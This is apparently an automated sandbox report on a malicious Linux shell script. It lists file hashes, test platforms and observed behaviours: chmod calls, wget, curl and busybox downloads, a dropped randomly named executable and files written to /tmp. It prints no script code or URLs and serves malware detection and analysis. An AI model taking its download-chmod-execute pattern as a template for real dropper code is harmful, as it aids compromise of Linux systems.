Analysis
max time kernel
31s
max time network
129s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240508-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system
submitted
24/11/2024, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b.sh
Resource
debian9-mipsel-20240418-en
General
Target
f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b.sh
Size
10KB
MD5
b8957a4d872db8549e6dd376ab9dafcc
SHA1
92bd1f467ac4ee061f16287c03b87e0b08bd1ec7
SHA256
f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b
SHA512
dc72ec24cf00f2137c1523a199d86c0c507173013220d9b44f0304ff2ef9c1086fdce94d435aeaca9f68818b7af05083109fc3c2eaf99a341fa00838d393a406
SSDEEP
192:YiiT1B9dLJyOdggODXRA13TP9dLJyOLggODXm3TQX:YiiT1B9dLJyOgA1P9dLJyOhQX
Malware Config
Signatures
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid   Process
1650  chmod
1656  chmod
1542  chmod
1536  chmod
1614  chmod
1662  chmod
1688  chmod
1524  chmod
1590  chmod
1596  chmod
1602  chmod
1682  chmod
1548  chmod
1578  chmod
1638  chmod
1572  chmod
1668  chmod
1566  chmod
1560  chmod
1584  chmod
1632  chmod
1554  chmod
1608  chmod
1620  chmod
1626  chmod
1676  chmod
1530  chmod
1644  chmod
Executes dropped EXE 28 IoCs
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid   Process
1569  wget
1571  busybox
1574  rm
1629  wget
1631  busybox
1633  YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q
1570  curl
1573  YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q
1630  curl
1634  rm
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97